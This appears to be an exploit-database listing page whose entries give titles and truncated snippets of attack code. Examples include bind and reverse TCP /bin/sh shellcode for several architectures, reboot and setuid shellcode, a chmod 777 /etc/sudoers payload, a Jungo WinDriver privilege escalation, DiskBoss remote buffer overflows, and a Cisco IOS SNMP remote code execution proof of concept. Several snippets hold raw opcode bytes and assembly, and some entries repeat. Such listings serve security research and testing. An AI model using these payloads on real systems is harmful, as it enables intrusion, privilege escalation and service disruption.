Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)

.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...

FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes)

/ FreeBSD shellcode that binds /bin/sh to port 41254 Assembly code and explanation will be released on safemode.org soon. Written by zillion zillion at safemode.org / char shellcode = "\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0"...

FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)

/ -------------- FreeBSD/x86 - execv"/bin/sh" 23 bytes ------------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : email protected / include include char shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50" "\x54\x53\xb0\x3b\x50\xcd\x80"; int...

FreeBSD/x86 - reboot() Shellcode (15 Bytes)

/ FreeBSD reboot shellcode This will halt a system, which takes it offline until someone reboots it. Written by zillion at safemode.org / char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret; ret = int &ret + 2; ret = intshellcode;...

Alpha - setuid() Shellcode (156 bytes)

char shellcode= "\x30\x15\xd9\x43" / subq $30,200,$16 / "\x11\x74\xf0\x47" / bis $31,0x83,$17 / "\x12\x14\x02\x42" / addq $16,16,$18 / "\xfc\xff\x32\xb2" / stl $17,-4$18 / "\x12\x94\x09\x42" / addq $16,76,$18 / "\xfc\xff\x32\xb2" / stl $17,-4$18 / "\xff\x47\x3f\x26" / ldah $17,0x47ff$31 /...

Alpha - /bin/sh Shellcode (80 bytes)

/ Lamont Granquist email protected email protected / int rawcode = 0x2230fec4, / subq $16,0x13c,$17 2000/ 0x47ff0412, / clr $18 2000/ 0x42509532, / subq $18, 0x84 2000/ 0x239fffff, / xor $18, 0xffffffff, $18 / 0x4b84169c, 0x465c0812, 0xb2510134, / stl $18, 0x134$172000/ 0x265cff98, / lda $18,...

BSD/x86 - setreuid(geteuid(), geteuid()) + execve(/bin/sh) Shellcode (36 bytes)

/ bsd/x86 setreuid/exec shellcode setreuidgeteuid, geteuid and execve"/bin/sh", "/bin/sh", 0 shellcode based on hkpco's setreuid/exec shellcode for linux Tested on FreeBSD / include include char shellcode = "\x31\xc0\xb0\x19\x50\xcd\x80\x50" "\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuidgeteuid,...

Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)

/ Title: Linux/x86 - execve/bin/sh Polymorphic Shellcode 53 bytes Date: 10-Jan-2018 Exploit Author: Debashis Pal SLAE-1122 Tested on: i686 GNU/Linux '//bin/sh' = 0x68732f6e 0x69622f2f polymorphic.nasm global start section .text start: add esi, 0x30 ;junk xor ecx, ecx mul ecx mov dword esp-4, ecx...

Jungo Windriver 12.5.1 - Local Privilege Escalation

// ConsoleApplication1.cpp : Defines the entry point for the console application. // include "stdafx.h" include include define device L"\\.\WINDRVR1251" define SPRAYSIZE 30000 typedef NTSTATUSWINAPI PNtAllocateVirtualMemory HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits, PULONG...

DiskBoss Enterprise 8.8.16 - Buffer Overflow Exploit

Exploit for windows platform in category remote exploits Exploit Title: DiskBoss = 8.8.16 - Unauthenticated Remote Code Execution Date: 2017-08-27 Exploit Author: Arris Huijgen Vendor Homepage: http://www.diskboss.com/ Software Link: http://www.diskboss.com/setups/diskbossentsetupv8.8.16.exe...

DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow

DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow Exploit Title: DiskBoss = 8.8.16 - Unauthenticated Remote Code Execution Date: 2017-08-27 Exploit Author: Arris Huijgen Vendor Homepage: http://www.diskboss.com/ Software Link: http://www.diskboss.com/setups/diskbossentsetupv8.8.16.exe Version:...

Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)

Linux/x86 - execve/bin/sh + Polymorphic Shellcode 53 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - execve/bin/sh Polymorphic Shellcode 53 bytes Date: 10-Jan-2018 Exploit Author: Debashis Pal SLAE-1122 Tested on: i686 GNU/Linux '//bin/sh' = 0x68732f6e 0x69622f2f...

Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)

Linux/x86 - execve/bin/dash Shellcode 30 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : exec /bin/dash - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/dash shell ; OS : Linux ; Arch :...

DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow

Exploit Title: DiskBoss = 8.8.16 - Unauthenticated Remote Code Execution Date: 2017-08-27 Exploit Author: Arris Huijgen Vendor Homepage: http://www.diskboss.com/ Software Link: http://www.diskboss.com/setups/diskbossentsetupv8.8.16.exe Version: Through 8.8.16 Tested on: Windows 7 SP1 x64, Windows...

Cisco IOS - Remote Code Execution Exploit

Exploit for hardware platform in category remote exploits !/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service...

Linux/x86 chmod 777 /etc/sudoers Shellcode (36 bytes)

/ Description ; Title : chmod 777 /etc/sudoers - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : chmod /etc/sudoers permissions ; OS : Linux ; Arch : x86 ; Size : 36 bytes chmod.nasm global start section .text start: ;...

Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)

/ Title: Linux/x86 - Reverse TCP Shell /bin/sh 127.1.1.1:8888/TCP Null-Free Shellcode 69 bytes Description: Smallest /bin/sh Reverse TCP ShellcodeNull Free, No Register Pollution Required Date : 4/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: Smallest /bin/sh based Null & Regist...

Cisco IOS SNMP Remote Code Execution

!/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - Descriptio...

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Cisco Ios

CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code exe...

Cisco IOS - Remote Code Execution

Cisco IOS - Remote Code Execution !/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco...